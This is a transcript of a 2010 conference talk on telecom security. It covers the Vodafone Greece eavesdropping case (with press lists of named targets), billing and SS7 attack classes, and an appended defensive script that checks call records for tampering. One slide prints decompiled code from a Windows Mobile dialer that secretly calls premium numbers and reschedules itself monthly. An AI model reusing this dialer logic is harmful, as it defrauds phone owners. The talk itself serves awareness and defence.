"Telecom Security Issues"
An overview of Key Threats & Actors, Case Studies and Possible Scenarios

Raoul Chiesa, UNICRI
Club Hack Conference, Pune, December 4th, 2010

Disclaimer
+ The information contained within this presentation does not infringe on any intellectual property, nor does it contain tools or recipes that could be in breach of known Indian laws (is there any lawyer in the room, btw? ;)
+ Quoted trademarks belong to their registered owners.
+ The views expressed are those of the author and do not necessarily reflect the views of UNICRI or other United Nations agencies and institutes, nor the view of ENISA and its PSG (Permanent Stakeholders Group).

The speaker: Raoul "nobody" Chiesa
* On the underground scene since 1986
* Senior Advisor on cybercrime at the United Nations (UNICRI)
* ENISA PSG Member (2010-2012)
* Founder, @ Mediaservice.net (Independent Security Advisory Company) and @ PSS (a Digital Forensics Company)
* Founder, Board of Directors at: CLUSIT (Italian Information Security Association), ISECOM, OWASP Italian Chapter
* TSTF.net Associated Member
* Member: ICANN, OPSI/AIP, EAST

About UNICRI
What is UNICRI
* United Nations Interregional Crime & Justice Research Institute
* A United Nations entity established in 1968 to support countries worldwide in crime prevention and criminal justice
* UNICRI carries out applied research, training, technical cooperation and documentation/information activities
* UNICRI disseminates information and maintains contacts with professionals and experts worldwide
* Counter Human Trafficking and Emerging Crimes Unit: cyber crimes, counterfeiting, environmental crimes, trafficking in stolen works of art...
About ENISA
What
+ European Network & Information Security Agency
+ ENISA is the EU's response to security issues of the European Union
+ "Securing Europe's Information Society" is our motto (27 Member States)
+ In order to accomplish our mission, we work with EU Institutions and Member States
+ ENISA came into being following the adoption of Regulation (EC) No 460/2004 of the European Parliament and of the Council on 10 March 2004. Operations started in September 2005, after moving from Brussels to Crete, and with the arrival of staff recruited through EU25-wide competitions with candidates coming from all over Europe.
+ ENISA is helping the European Commission, the Member States and the business community to address, respond to and especially to prevent Network and Information Security problems.
+ The Agency also assists the European Commission in the technical preparatory work for updating and developing Community legislation in the field of Network and Information Security.
+ I'm a Member of ENISA's PSG, the Permanent Stakeholders Group.

About TSTF.net
* We are a think-tank established more than 10 years ago.
* We (the team members) have all known each other since the 80's.
* Some names: Emmanuel Gadaix, Philippe Langlois, Stavroula "Venix" Ventouri, Fyodor Yarochkin (xprobe2), ...
* Together we have pentested/audited more than 120 phone operators all over the world.
* Huge experience, no sales pitches: we know our stuff.
* Built the very first open-source SS7 scanner (SCTP).
* Making R&D every day, every hour, every single minute ;)

More on TSTF.net
Who's who
* 35 years combined GSM telecommunications experience;
* 50 years combined information security experience;
* A unique view on telco security: nobody else does it;
* Active research (papers, tools, forums);
* Experience in Europe, Asia, USA;
* Self-funded, no business cunts running it, no VCs.
Networked structure
* Structure similar to the Global Business Network (http://www.gbn.org/);
* No central office, global coverage;
* Leverage on each individual's skills and services;
* Leverage on the network effect.

Our experiences (excerpt, 1999-2004) (obviously, we've got much MORE ;)
* 1999: GSM Internet Data Access Penetration Tests
* 2000: GPRS Internet Data Access Penetration Tests
* 2000/2008: ... Security Audits (+15 MLN subscribers)
* 2000: SMS Spoofing PoC & Security Consulting
* 2001: Dealers' shops Abuse Security Testing
* 2001: SMSC Ethical Hacking Test
* 2001: SAP environments Security Audit
* 2001-2008: VAS Security Audits and Pen-testings
* 2001-2008: xIOS and Firewall tuning and configuration review
* 2002/2008: Wireless Penetration Tests on HQ and main branches (+10 MLN subscribers; +15 MLN subscribers)
* 2002: Wireless Security Policy (private and public hot-spots)
* 2003: Portals Web Applications Security Testing (various tests on the applications developed for the subscribers)
* 2003: Billing gateway process Full Security Audit & Pentests
* 2003: MMS environment Ethical Hacking tests
* 2008: BlackBerry FE/BE Penetration Testing
* 2004: X.25 Security Audit Full Process (9 months)
* 2004: New mobile threats R&D process (3 months)
* 2008: DoS incident handling policy (referred to the private WAN)

Topics for this session
* Introduction
* MSC hacking / the Vodafone Greece Affair
* Data Network Elements hacking (i.e. GPRS)
* Billing, Mediation, LIS/LIG hacking
* SS7 hacking
* Web Applications' suppliers standard issues

THE PROBLEM
* Telecommunications vendors (Nokia, Ericsson, Alcatel, etc.) are selling insecure software and systems to telcos.
* Telecommunications operators have a very poor understanding of security issues.
* Based on 10 years of penetration testing experience, telco operators are the most vulnerable of all industry groups.
* Sophisticated hackers have an increased interest in telco security and phone hacking.
THE VENDORS
* Some vendors have decided to take an active stance in security (e.g. Nokia); however, such initiatives are isolated and do not address most telcos' security problems.
* Most vendors sell antiquated software full of bugs, running on old and unpatched versions of operating systems and daemons.
* Operators cannot fix the identified security weaknesses because it would void their warranty.
* The result of this "head in the sand" approach is an increase in the threat: national and international critical infrastructures are at risk.

THE OPERATORS
* Operators rely on vendors for secure solutions.
* Operators are primarily focused on network operations, software upgrades, network performance and other time-consuming routine tasks.
* Operators lack in-house expertise on telco security.
* Operators are usually divided between the IT and Engineering departments, creating two separate security domains.
* Most telcos' networks are open to attackers (I don't say "hackers"!).
* GSM operators typically split their network between IT (the incompetent team running the mail, the domains, the printers and the proxy/firewall) and Engineering (the telco side).
* Usually there is distrust between the two entities, poor communications and certainly no common policy towards security. IT of course believe they are important, but in fact they just have a support role: if all IT systems stop working, you can still make phone calls.
(Emmanuel Gadaix, TSTF - Black Hat Asia Security Conference, 2001)

THE OPERATORS
Based on a +10 years study encompassing 24 network operators in four different continents (EU, Asia, USA, Australia):
* 100% could be hacked from the Internet via Web Apps
* 90% could be hacked through PSTN, X.25, ISDN or Wi-Fi
* 72% had a security incident in the last 2 years
* 23% had appropriate perimeter security control
* 0% had all their mission-critical hosts (really) secured
* 0% had comprehensive database security in place
* 0% had integrity measures protecting billing data, nor encryption

THE ENEMY
* Telco fraud is still an attractive target: bypassing toll, getting services without fees, setting up premium numbers, etc.;
* Privacy invasions: interception of call-related data (e.g. CDRs, SMS contents, signalling data, billing data, etc.);
* Eavesdropping and cloning: illegal interception and cloning of mobile phones. Recently one underground group announced it was reverse engineering Nokia and Symbian software;
* A group of sophisticated hackers is working on abusing the SS7 protocol;
* Another group of international security researchers is working on VoIP attacks in telco environments (Mobile, PSTN/ISDN, SS7, I.N.).

THE COMPETITION
* Traditional security shops: no knowledge of telcos, poor understanding of telco procedures.
* Traditional telco consultancies: very poor knowledge of security issues.
* "Big 4" audit firms: focused on policies, no real expertise (they outsource their jobs to us).
* In-house resources: very dangerous. Internal fraud is overlooked; interdepartmental ego problems; good security and bad security look the same.

DOING NOTHING...
* ...with your telco infrastructures today is like doing nothing with the RAS accesses in the 80's...
* ...with the X.25 networks in the 90's...
* ...and with your Internet hosts during the Y2K: it's an open invitation for disaster.
"BUT... WHY SHOULD WE C4R3 'BOUT TH3S3 L33T ATTACK3RS?!?"
[figure: service network diagram with Rating, Mediation and Billing boxes]
...BECAUSE YOU LOSE YOUR MONEY.

AND, because...
* Hackers have been speaking about, investigating, discussing and hacking telco-related stuff (everything!) for a long time now (it began in the 70's, became a trend in the 80's and 90's, and a standard from 2000 up to today).
* ...Wanna see some examples??

2008
* DEFCON 16 - Taking Back your Cellphone - Alexander Lash
* BH DC/BH Europe - Intercepting Mobile Phone/GSM Traffic - David Hulton, Steve
* BH Europe - Mobile Phone Spying Tools - Jarno Niemela
* BH USA - Mobile Phone Messaging Anti-Forensics - Zane Lackey, Luis Miras
* Ekoparty - Smartphones (in)security - Nicolas Economou, Alfredo Ortega
* BH Japan - Exploiting Symbian OS in mobile devices - Collin Mulliner
* GTS-12 - iPhone and iPod Touch Forensics - Ivo Peixinho
* 25C3 - Hacking the iPhone - MuscleNerd, pytey, planetbeing
* 25C3 - Locating Mobile Phones using SS7 - Tobias Engel
* 25C3 - Anatomy of smartphone hardware - Harald Welte
* 25C3 - Running your own GSM network - H. Welte, Dieter Spaar
* 25C3 - Attacking NFC mobile phones - Collin Mulliner

2009/1
* ShmooCon - Building an All-Channel Bluetooth Monitor - Michael Ossmann and Dominic Spill
* ShmooCon - Pulling a John Connor: Defeating Android - Charlie Miller
* BH USA - Attacking SMS - Zane Lackey, Luis Miras (premiere at YSTS 3.0, BR)
* BH USA - Fuzzing the Phone in your Phone - Charlie Miller, Collin Mulliner
* BH USA - Is Your Phone Pwned? - Kevin Mahaffey, Anthony Lineberry & John Hering
* BH USA - Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone - Vincenzo Iozzo & Charlie Miller
* BH USA - Exploratory Android Surgery - Jesse Burns
* DEFCON 17 - Jailbreaking and the Law of Reversing - Fred Von Lohmann, Jennifer Granick
* DEFCON 17 - Hacking WITH the iPod Touch - Thomas Wilhelm
* DEFCON 17 - Attacking SMS. It's No Longer Your BFF - Brandon Dixon
* DEFCON 17 - Bluetooth, Smells Like Chicken - Dominic Spill, Michael Ossmann, Mark Steward

2009/2
* BH Europe - Fun and Games with Mac OS X and iPhone Payloads - Charlie Miller and Vincenzo Iozzo
* BH Europe - Hijacking Mobile Data Connections - Roberto Gassira and Roberto Piccirillo
* BH Europe - Passports Reloaded Goes Mobile - Jeroen van Beek
* CanSecWest - The Smart-Phones Nightmare - Sergio 'shadown' Alvarez
* CanSecWest - A Look at a Modern Mobile Security Model: Google's Android - Jon Oberheide
* CanSecWest - Multiplatform iPhone/Android Shellcode, and other smart phone insecurities - Alfredo Ortega and Nico Economou
* EuSecWest - Pwning your grandmother's iPhone - Charlie Miller
* HITB Malaysia - Bugs and Kisses: Spying on Blackberry Users for Fun - Sheran Gunasekera
* YSTS 3.0 / HITB Malaysia - Hacking from the Restroom - Bruno Gonçalves de Oliveira
* PacSec - The Android Security Story: Challenges and Solutions for Secure Open Systems - Rich Cannings & Alex Stamos
* DeepSec - Security on the GSM Air Interface - David Burgess, Harald Welte
* DeepSec - Cracking GSM Encryption - Karsten Nohl
* DeepSec - Hijacking Mobile Data Connections 2.0: Automated and Improved - Roberto Piccirillo, Roberto Gassira
* DeepSec - A practical DOS attack to the GSM network - Dieter Spaar

Overview on attacks
(then we'll jump straight to a few single topics)

A MORE COMPLICATED WORLD...
[figure: a cloud of network technologies, among them DECT, GSM, VSAT, public safety networks and Voice over Internet Protocol, each with its own testing methods]

...WITH DIFFERENT STANDARDS, BUT A UNIQUE MARKET
[figure: mobile operators]

...BUT THE THREAT IS GLOBAL

PHREAKING TELCOS
* Phreaking is a slang term for the action of making a telephone system do something that it normally should not allow.
* Why would anyone do this??
"I do it for one reason and one reason only. I'm learning about a system. The phone company is a System. A computer is a System, do you understand? If I do what I do, it is only to explore a system. Computers, systems, that's my bag. The phone company is nothing but a computer."
Captain Crunch, from "Secrets of the Little Blue Box", Esquire Magazine, October 1971
(pause) LOL!!

A QUICK OVERVIEW: ATTACKS ON MOBILE OPERATORS/1
* The "Phreaking" concept can be explained as "Hacking the phone line";
* Since the 60's, phreaking exploded all around the world;
* From those times, intrusion stories in telco environments became very common;
* In the following slides we will give you a summary of the various types of attacks that can be applied in Mobile Networks;
* Many of these attacks have been practically tested and demonstrated by our Tiger Team over the years.

A QUICK OVERVIEW: ATTACKS ON MOBILE OPERATORS/2
Attacks have been classified into the following areas:
* RAN Attacks (Radio Access Network)
* TN Attacks (Transmission Network)
* NSS Attacks (Network Switched Network)
* IN Attacks (Intelligent Network)
* SMS/Messaging Attacks (SMS, VMS)
* MMS Attacks
* NMS/OSS Attacks (Network Management System/Operations)
* ME & Billing GW Attacks (Mediation and Billing)
* LIS/LIG Attacks (Legal Interception System/Gateway)
* SS7 Attacks (Signalling System #7)
* ...not forgetting the "old school" PSTN, ISDN and X.25 attacks

THE NETWORK ELEMENTS
* Radio Access Network (BSS/RAN)
* Mobile Switching Center (MSC/NSS)
* Home Location Register (HLR/VLR)
* Intelligent Network (IN)
* Messaging (SMSC, MMSC, USSD, VMS)
* Packet data (GPRS, EDGE, 3G/UMTS)
* Network Management (NMS, OMC, OSS)
* Mediation, Billing, Customer Care, LIG

MSC
* Mobile Switching Center
* Is probably the most important asset in a Mobile Operator
* We will speak about the Vodafone Greece case shortly...

GGSN
* Ollie Whitehouse around 2002/2003 successfully exploited Nokia GPRS-related elements (GGSN, SGSN).
* Result? DoS on all of your Data connections (Operator Level) if you ran GPRS on Nokia's HW (at that time, obviously).
* Is it only Nokia? NO! ALL of them may be vulnerable.

Web Applications Security
* I've moved this to the last section, along with "evidences".
* Basically, the problem here is that the "standard players" (Big 4, Accenture, etc. etc.) are often releasing insecure Web Applications.
* Exposed to:
  - XSS/CSRF/etc.
  - SQL Injection(s)
  - ...whatever!

The "Vodafone Greece Affair"

In one shot - Greece
Basically, what the hell happened?
* One hundred "VIP" mobile subscribers have been eavesdropped: Government members, Defense officials mainly, including the Greek Prime Minister, Foreign, Defence, Public Order officials, etc.
* Calls from and to +100 SIMs were diverted to 14 "pay-as-you-go" mobile phones.
* Four BTS covered the area where these receiving SIMs were located.
* "Incidentally", the Athens US Embassy is right in the middle of them ;)
* This has been done via a high-level hack of the Ericsson AXE GSM MSC, building a rootkit "parked" in the RAM area, since obviously the MSC was in "production" (!!!).
* "The Hack" was discovered on March 7th, 2005, by Ericsson technical staff. One year later at least. Maybe longer... nobody knows.
* On March 9th, a Vodafone "top technician" (KT) committed suicide (Kostas Tsalikidis, 39 y.o., Head of Network Design).
* EYP (Hellas National Intelligence Agency) began investigating at once.
* Right now, no one has any idea about who did it and why.

Profiling: Actors involved
* Some elite hacker.
  - Retired Ericsson technical guy(s)?
* Some seriously-intentioned IA (CIA?).
* Some historical and geo-political situation (Carpe Diem).
* Local politicians and National Secret Service
* The Olympic Games?
* The "best hack of 2005" prize. For sure.

Targeted people (Vodafone Hellas/1)
GOVERNMENT TARGETS (name - role - press source):
* Karamanlis, Kostas - Prime Minister of Greece (two phones of 20) - Elef. 3Feb
* Molyviatis, Petros - then Foreign Minister, a private phone - Elef. 3Feb
* Spiliotopoulos, Spilios - then Minister of Defense - Elef. 3Feb
* Voulgarakis, Giorgos - then Minister of Public Order - Elef. 3Feb
* Papaligouras, Anastasios - Minister of Justice - Elef. 3Feb
* Valinakis, Giannis - Alternate Foreign Minister - Elef. 3Feb
* Dimas, Stavros - EU Commissioner - Elef. 3Feb
* Bakoyianni, Dora - then Mayor of Athens - Elef. 3Feb
* Vallindas, Giorgos - Ambassador, Foreign Ministry Mideast Division Director - Elef. 3Feb
* Choreftaki, Glykeria - Foreign Ministry employee - Elef. 3Feb
* Papantoniou, Giannis - PASOK MP, ex Minister of Defense - Elef.
* Apostolidis, Pavlos - then Head of Greek Intelligence Service (EYP), his car phone - Nea
* Karamanli, Natasha - wife of Prime Minister - Nea
* eight unidentified foreign ministry officials - Nea
* unnamed intelligence officials - EYP operations officers - Nea
* Korandis, Giannis - current EYP director, then Ambassador to Turkey, his private car phone - Nea 3-16
* Molyviati, Lora - daughter of former Foreign Minister - Nea 3-16

Targeted people (Vodafone Hellas/2)
POLICE/SECURITY TARGETS:
* Maravelis, Dimitris - Police officer in Olympic Security - Elef. 3Feb
* Maris, Giorgos - lawyer, legal advisor to Public Order Ministry - Elef. 3Feb
* Angelakis, Dimitris - Police in Olympic Security or EYP unionist - Elef. 3Feb
* Sontis, Theodore - U.S. Embassy Greek-American, gave to security detail - Elef.
* Kyriakakis, Evstratios - Former Director, Criminological Service, Greek Police - Ta Nea
* Galiatsos, G. - Director of Exercises, Athens Olympic Security - Ta Nea
* Mitropoulos, G. - Chief of Staff, Ministry of Public Order - Ta Nea
* Konstantinidis, V. - Olympic Games Security Director - Ta Nea
* Nasiakos, Fotis - Former Chief, Greek Police (phone given to another) - Ta Nea
* Dimoschakis, An. - Chief of Staff, Greek Police - Ta Nea
* Syrros, St. - Former director of Counterterrorism division, Greek Police - Ta Nea
* Galikas, D. - Director of Counterterrorism Division, Greek Police - Ta Nea
* Angelakos, Giorgos - Chief of Greek Police - Ta Nea
* seven senior military - Senior officers in general staff - Ta Nea
* General Staff Communications Dir. - Communications Director, chief of General Staff
* Defense Ministry staffer - Defense Ministry staff company - Eleft. 2/5

Targeted people (Vodafone Hellas/3)
FOREIGN CITIZENS TARGETS:
* Meim, Mohamad - Pakistani - Elef.
* Moktar, Ramzi - Sudanese - Elef.
* Maloum, Udin - Elef.
* Jamal, Abdullah - Lebanon radio reporter or Syrian journalist, now fast food operator - Elef.
* Sadik, Hussein Moh. - Pakistani store owner - Elef.
* Tarek, Ibrahim Ahmet - Iraqi - Elef.
* Kadir, Aris - Kurd - Elef.
* Thair, Hermiz - Iraqi - Elef.
* Ayoubi, Chadi - Lebanese al Jazeera reporter, Gr resident - Elef.
* Basari, Mohamed - Iraqi immigrant, Igoumenitsa, 3 years, furniture factory worker - Nea 3-16
* Unnamed Syrian - Unnamed Syrian, 3 years - Nea 3-16
* Unnamed Iraqi - Unnamed Iraqi, 2 years - Nea 3-16

Targeted people (Vodafone Hellas/4)
UNEXPLAINED TARGETS:
* Fergadis, Theodoros - businessman - Elef. 3Feb
* Kakotaritis, Giorgos - blanket factory? - Elef. 3Feb
* Linardos, Nikolaos - Pegasus financial co, underwear firm - Nea 3-16
* Cretan businessman - shipper of remote control airplanes, including Souda Bay - Vima 3/25
* Cretan refrigeration tech - Refrigeration tech from Ag. Nikolaos, Crete - Vima 3/25
* Koika, Katerina - journalist - Elef. 3Feb
* Psychogios, Giorgos - criminal lawyer, Thebes mayor candidate - Elef. 3Feb
* Makris, Kostas - Elef. 3Feb
* Barbarousi, Dimitra - Elef. 3Feb
* Notas, Anastasios - Elef.
* Pavlidis, Pavlos - Elef.
* Pnevmatikakis, Angelos - Elef.
* unknown card phone 6942 5447.. - Activated 2/28/05 - Vima 2/25

Conclusions
* A "suicided" dead man here too...
  - Telecom Italia scandal (2005)
  - KGB/CCC (1989)
* A very light negative image of Vodafone Hellas: the media didn't hit the subject that hard in the news coverage.
* Obscure CIA links?
* Rootkit Ericsson AXE MSC.

5 years later.... (2010)
* What's going on?!?
* It happened that organized cybercrime gangs began realizing, since 2005, that it's all about money...
* And that the end-user is an easier hack than a Corporate Telco (depends on the Telco, though! ;)

Upcoming issues: targeting the end-user with mobile dialers

[forum post by user smudgelab, Join Date: Jan 2010, Posts: 38]
Phone dialled out internationally without permission!
Really weird one this. Last night, I was woken by a repetitive voice telling me that "International dialling is not currently permitted from this device". As this was at approx. 02.40 on Sunday AM, it fair shook me out of a deep sleep! On checking the phone I found the following call history:
+88213213214 @ 02:44
+88213213214 @ 02:36
+1(767)503-3611 @ 02:36
+1(767)503-3611 @ 02:36
+1(767)503-3611 @ 02:36
+8823460777 @ 02:35
I have absolutely no idea who or what these numbers are for (Google suggests +882 may be something to do with satellite phones (!?) & +1767 appears to be a Dominican country code (!!?) but it was very unnerving to see my phone has been trying to ring these without any input from me. I'll be onto Virgin Mobile later to see if they can help but thought I'd try the collective wisdom of you guys first. Virus/dialler maybe? Do these even exist for WinMo phones? Any help will be very much appreciated. Thank you.

Uh? How did this happen?? "Playing games", do ya?? ;)
[screenshot: a Windows Mobile games application]

Let's pick up one... and its "hidden" code
(decompiled C# from the dialer as shown on the slide; the condition on the second line is truncated in the slide)

    // Runs only when the registry "Status" flag is set and the code base matches (condition truncated).
    int numS = (int) key.GetValue("Status");
    if ((numS == 1) && (Assembly.GetExecutingAssembly().GetName().CodeBase /* ... truncated in the slide */))
    {
        // Six outbound calls to international, satellite and premium destinations,
        // 0xc350 = 50000 ms = 50 seconds apart.
        Phone phone = new Phone();
        phone.Talk("+8823460777");
        Thread.Sleep(0xc350);
        phone.Talk("+17675033611");
        Thread.Sleep(0xc350);
        phone.Talk("+88213213214");
        Thread.Sleep(0xc350);
        phone.Talk("+25240221601");
        Thread.Sleep(0xc350);
        phone.Talk("+2392283261");
        Thread.Sleep(0xc350);
        phone.Talk("+881842011123");
        // Persistence: schedule itself to run again one month from now via the
        // Windows CE notification API.
        long num6 = DateTime.Now.AddMonths(1).ToFileTime();
        long num7 = 0L;
        FileTimeToLocalFileTime(ref num6, ref num7);
        SystemTime time6 = new SystemTime();
        FileTimeToSystemTime(ref num7, time6);
        CeRunAppAtTime(@"\Windows\smart32.exe", time6);
    }

The numbers
* +882346077 - Antarctica
* +17675033611 - Dominican Republic
* +88213213214 - EMSAT satellite prefix
* +25240221601 - Somalia
* +2392283261 - São Tomé and Príncipe
* +881842011123 - Globalstar satellite prefix
[screenshot: a "premium-rates" international payout website listing per-destination payouts]

So... we're talking about Billing, right? That, to me, goes straight along with Mediation ;)

MEDIATION AND BILLING
[figure: collection system, provisioning, charging gateway and formatted CDRs]
* Mediation is the process that converts and transports raw CDR data
* It can also be used to translate provisioning commands to the NE
* It is a critical part of the provisioning and billing cycles
* Most convenient place to commit fraud

THE BILLING PROCESS
[figure: the billing process]

ATTACKS ON MEDIATION / BILLING
* Raw database edit. Conveniently deletes selected records containing billing data.
* Modification of the charging tables in the billing system
* Patching of the rater application to eliminate certain CDRs, e.g. belonging to a given MSISDN
* Backdoors in mediation gateways to remove CDR data
* Confidential information on subscribers' activities (numbers called, received, SMS, data, etc.)
* Modification of CDR processing rules
* Modification of "test numbers" whitelist
* Live patching of CDR data while in the mediation queue
* Patching of the mediation application (e.g. loading scripts)
* GPRS packet aggregation rules modification

L.I.G./L.I.S. ATTACKS
* Legal Interception Gateway is used by police and intelligence agencies.
* Connected to the MSC through a special interface. Very user-friendly.
* Based on standard UNIX and TCP/IP, so potentially open to common attacks
* Compromise of a LIG would allow real-time interception and call eavesdropping.
* Could compromise the agencies' own facilities.
* RAOUL, don't forget to tell 'em about the "911 Pentest".... ;)

SS7: the next nightmare
* A Signalling & Billing (inter-operator) protocol built in the 70's and developed in the 80's.
* Why? LOL... 'cause Captain Crunch invented blue-boxing, which ran in-band. So SS7 went "out-of-band". Simple (KISS)!

SS7 SIGNALLING
* Mobile networks primarily use Signalling System no. 7 (SS7) for communication between networks for such activities as authentication, location update, supplementary services and call control. The messages unique to mobile communications are MAP messages.
* The security of the global SS7 network as a transport system for signalling messages, e.g. authentication and supplementary services such as call forwarding, is open to major compromise.
* The problem with the current SS7 system is that messages can be altered, injected or deleted into the global SS7 networks in an uncontrolled manner.

EXAMPLES OF SS7 ATTACKS
* Theft of service, interception of calling card numbers, privacy concerns
* Introduce harmful packets into the national and global SS7 networks
* Get control of call processing, get control of accounting reports
* Obtain credit card numbers, non-listed numbers, etc.
* Messages can be read, altered, injected or deleted
* Denial of service, security triplet replay to compromise authentication
* Annoyance calls, free calls, disruption of emergency services
* Capture of gateways, rerouting of call traffic
* Disruption of service to large parts of the network
* Call processing exposed through Signaling Control Protocol
* Announcement service exposed to IP through RTP
* Disclosure of bearer channel traffic

SS7 ENTRY POINTS
* With a limited number of carriers and limited points of interconnection, the operators could assume with fair certainty that all of the elements passing data were trusted sources.
* Unlike IP protocols, security features like authentication and encryption were not built into the SS7 protocol. Rather, the focus has been placed on creating secure physical environments for the network equipment rather than secure protocols.
* STPs, the routers of the SS7 network, perform gateway screening to prohibit inbound and outbound messages from unauthorized nodes. The addresses of individual nodes within a network are isolated.
* Global title translation (GTT) enables a network to receive messages from other networks without disclosing the unique addresses, called point codes, of its own nodes.

SS7: ATTACK TAXONOMY
[figure: taxonomy table with the columns Interception, Interruption, Modification and Fabrication; entries include eavesdropping (software/hardware), denial of service (software/hardware), spoofing, SSP and STP impersonation, ISUP/SCCP/TCAP message modification and generation, MTP link management attacks, speed dialing, number translation and routing database attacks, SCP message rerouting, TCAP DB query fabrication and toll fraud]

SOME REAL-LIFE EVIDENCES
* WI-FI: HW TOOLS FOR PROACTIVE SECURITY [screenshot]
* CDR FILES FROM MEDIATION AREA [screenshot of a raw CDR file]
* PROCESSED SMS: "FROM" & "TO" [screenshot]
* SMS PROCESSING QUEUE: SNIFFING ON "IN PROGRESS" SMSs [screenshot]
* OBTAINING CUSTOMERS INFORMATION [screenshots of an Italian telco agent portal: login page with a wrong-password error, agent home page, customer detail page; note on the slide: "This can be scripted"]

Contacts
Raoul Chiesa
Senior Advisor, Strategic Alliances & Cybercrime Issues
UNICRI - United Nations Interregional Crime & Justice Research Institute
@ Mediaservice.net, Founder
Email: chiesa@UNICRI.it (UN), raoul@mediaservice.net (business)

QUESTIONS?
THANKS FOR YOUR ATTENTION GUYS!!!!
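The mediation and billing slides above list raw record deletion and live patching of CDRs in the mediation queue among the attacks, and the operator survey reports that 0% had integrity measures protecting billing data. The following Python sketch is an added example, not code from the talk or from TSTF: it chains each CDR of a mediation batch into a SHA-256 hash chain and authenticates the chain head with an HMAC, so the rating stage can reject a batch from which records were deleted, altered or reordered and point at the first divergent record. The CDR field names, sample values and the key are constructed for this example.

```python
"""Tamper-evident CDR batches for a mediation queue (added example).

Each record is chained into a SHA-256 hash chain and the chain head is
authenticated with an HMAC under a key the mediation host does not hold,
so deleting, editing or reordering records before rating is detectable
and the first divergent record can be located.
"""
import hashlib
import hmac
import json

# Constructed sample CDRs, normalised as a mediation system might emit them.
# Numbers, times and field names are made up for this example.
SAMPLE_CDRS = [
    {"seq": 1, "msisdn": "+390000000001", "called": "+390000000002",
     "start": "2010-12-04T02:35:10Z", "duration_s": 61, "type": "MOC"},
    {"seq": 2, "msisdn": "+390000000001", "called": "+88213213214",
     "start": "2010-12-04T02:36:02Z", "duration_s": 44, "type": "MOC"},
    {"seq": 3, "msisdn": "+390000000003", "called": "+390000000001",
     "start": "2010-12-04T02:40:31Z", "duration_s": 12, "type": "MTC"},
    {"seq": 4, "msisdn": "+390000000004", "called": "+390000000005",
     "start": "2010-12-04T02:44:00Z", "duration_s": 305, "type": "MOC"},
]
# Constructed key; in production it belongs in an HSM or key vault, not on
# the mediation host whose operators this check is meant to audit.
BATCH_KEY = b"constructed-demo-key-do-not-use"
GENESIS = b"\x00" * 32


def canonical(record: dict) -> bytes:
    """Stable byte encoding so the same CDR always hashes the same way."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode()


def chain_digests(cdrs: list) -> list:
    """Per-record chain digests: d_i = SHA256(d_{i-1} || canonical(cdr_i))."""
    digests, prev = [], GENESIS
    for rec in cdrs:
        prev = hashlib.sha256(prev + canonical(rec)).digest()
        digests.append(prev)
    return digests


def seal_batch(cdrs: list, key: bytes) -> dict:
    """Seal stored beside the batch by the collector: count, chain, HMAC of head."""
    digests = chain_digests(cdrs)
    head = digests[-1] if digests else GENESIS
    return {
        "count": len(cdrs),
        "chain": [d.hex() for d in digests],
        "tag": hmac.new(key, head, hashlib.sha256).hexdigest(),
    }


def verify_batch(cdrs: list, seal: dict, key: bytes) -> tuple:
    """Validate a batch against its seal. Returns (ok, detail)."""
    # 1. Authenticate the seal itself; otherwise whoever edits the records
    #    could simply store a fresh seal over the edited batch.
    head = bytes.fromhex(seal["chain"][-1]) if seal["count"] else GENESIS
    expected_tag = hmac.new(key, head, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected_tag, seal["tag"]):
        return False, "seal rejected: HMAC does not verify (forged or sealed under another key)"
    # 2. Walk the chain; the first digest that differs marks where a record
    #    was altered, removed or moved (every later digest differs as well).
    digests = chain_digests(cdrs)
    for i, d in enumerate(digests[: seal["count"]]):
        if d.hex() != seal["chain"][i]:
            return False, f"chain breaks at record index {i}: record altered, removed or reordered"
    # 3. A matching prefix but a different length means records were dropped
    #    from the tail or appended after sealing.
    if len(cdrs) != seal["count"]:
        return False, f"record count {len(cdrs)} differs from sealed count {seal['count']}"
    return True, "batch intact"


if __name__ == "__main__":
    seal = seal_batch(SAMPLE_CDRS, BATCH_KEY)
    print("untouched:", verify_batch(SAMPLE_CDRS, seal, BATCH_KEY))
    # Simulate the "raw database edit" from the slides: drop one billable record.
    edited = [r for r in SAMPLE_CDRS if r["seq"] != 2]
    print("record removed:", verify_batch(edited, seal, BATCH_KEY))
```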
